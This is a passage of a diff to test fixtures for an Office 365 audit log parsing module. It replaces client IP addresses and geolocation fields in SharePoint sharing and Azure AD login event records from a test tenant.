+{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","TargetUserOrGroupName":"Limited Access System Group","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"<Permissions granted>Limited Access</Permissions granted>","RecordType":14,"ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"216.160.83.57","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"88a041e3-2f3a-483c-cf76-08d7b17b4e5b","UserType":0}
+{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"<Permissions granted>System.LimitedEdit</Permissions granted>","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"216.160.83.57","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0}
diff --git a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json
index 504cc25e971d..b6d0cabb7341 100644
--- a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json
@@ -261,8 +261,8 @@
     },
     {
         "@timestamp": "2020-02-14T18:25:45.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "SharingInheritanceBroken",
         "event.category": "web",
         "event.code": "SharePointSharingOperation",
@@ -279,7 +279,7 @@
         "input.type": "log",
         "log.offset": 3965,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
         "o365.audit.CreationTime": "2020-02-14T18:25:45",
         "o365.audit.EventData": "<copyRoleAssignments>False</copyRoleAssignments><clearSubScopes>False</clearSubScopes>",
@@ -302,20 +302,19 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -333,8 +332,8 @@
     },
     {
         "@timestamp": "2020-02-14T18:25:45.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "AnonymousLinkCreated",
         "event.category": "web",
         "event.code": "SharePointSharingOperation",
@@ -351,7 +350,7 @@
         "input.type": "log",
         "log.offset": 5028,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
         "o365.audit.CreationTime": "2020-02-14T18:25:45",
         "o365.audit.EventData": "<Type>Edit</Type>",
@@ -378,20 +377,19 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -409,8 +407,8 @@
     },
     {
         "@timestamp": "2020-02-14T18:25:45.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "SharingSet",
         "event.category": "web",
         "event.code": "SharePointSharingOperation",
@@ -427,7 +425,7 @@
         "input.type": "log",
         "log.offset": 6178,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
         "o365.audit.CreationTime": "2020-02-14T18:25:45",
         "o365.audit.EventData": "<Permissions granted>Contribute</Permissions granted>",
@@ -455,20 +453,19 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -486,8 +483,8 @@
     },
     {
         "@timestamp": "2020-02-14T18:25:44.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "SharingSet",
         "event.category": "web",
         "event.code": "SharePointSharingOperation",
@@ -504,7 +501,7 @@
         "input.type": "log",
         "log.offset": 7466,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
         "o365.audit.CreationTime": "2020-02-14T18:25:44",
         "o365.audit.EventData": "<Permissions granted>Limited Access</Permissions granted>",
@@ -532,20 +529,19 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -563,8 +559,8 @@
     },
     {
         "@timestamp": "2020-02-14T18:25:44.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "SharingSet",
         "event.category": "web",
         "event.code": "SharePointSharingOperation",
@@ -581,7 +577,7 @@
         "input.type": "log",
         "log.offset": 8685,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
         "o365.audit.CreationTime": "2020-02-14T18:25:44",
         "o365.audit.EventData": "<Permissions granted>System.LimitedEdit</Permissions granted>",
@@ -609,20 +605,19 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log
index c3ce778caf06..76f787faad4a 100644
--- a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log
+++ b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log
@@ -1,69 +1,69 @@
-{"InterSystemsId": "03616b3a-fc75-46a1-b34a-2d82fc8f1e7e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:13", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c4206c29-46c2-4a6f-a46b-735107705400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ca0efc24-1b89-4962-8fef-a3ac5437302f"}
-{"InterSystemsId": "05d69096-cb90-4690-ae69-8acd5177b3e0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ed155e11-60b3-4764-b9aa-05c35f3bb800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b53de36d-ea71-4ebf-9b71-feb431bd4eba"}
-{"InterSystemsId": "0f5eb16e-8b22-49bf-a927-f6f310fd5879", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "6634d05a-72ec-4c27-8e69-03c57b202000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "10e2d141-839e-4913-ab3d-6cf1f4856eae"}
-{"InterSystemsId": "1150acae-a48d-4752-8847-7bacb7fe6e6c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1809f830-b010-4389-9607-e01ae175ca00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "68b3fd99-0dae-4479-926d-03cc0073dd08"}
-{"InterSystemsId": "16e81fcc-add3-46c2-8834-10ce330ffe76", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2a84e6ff-7340-426e-9d0d-e53092c0c600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "550af372-cdfd-4286-a1b7-d58df0dcd5d6"}
-{"InterSystemsId": "172703f7-324e-415a-a846-c39ca97eb1c8", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d66cd29f-596e-4878-b756-92b545d25f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b5f59a43-00cf-42c4-8685-a7166fd20e38"}
-{"InterSystemsId": "17f8756c-0bfa-49ad-8537-ada4e17a5f7d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:41", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1b395e92-5d02-408f-8bfe-139098a95500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "32e7fb94-6289-4fb4-855b-2ab78671ca4e"}
-{"InterSystemsId": "22aac168-9d0d-4c70-b94d-adc337ab7b06", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba18ea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "7314a65a-f383-40fb-a0c7-00c6c4cfabc0"}
-{"InterSystemsId": "23321532-a321-4c97-909d-9489979777d6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1909acba-a486-4ffc-805c-09fb73c0bf00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "97b494ee-9ba1-4444-b052-3459bdc9eaa5"}
-{"InterSystemsId": "291fb7ce-4e56-47fd-a78e-4e9012f112ab", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 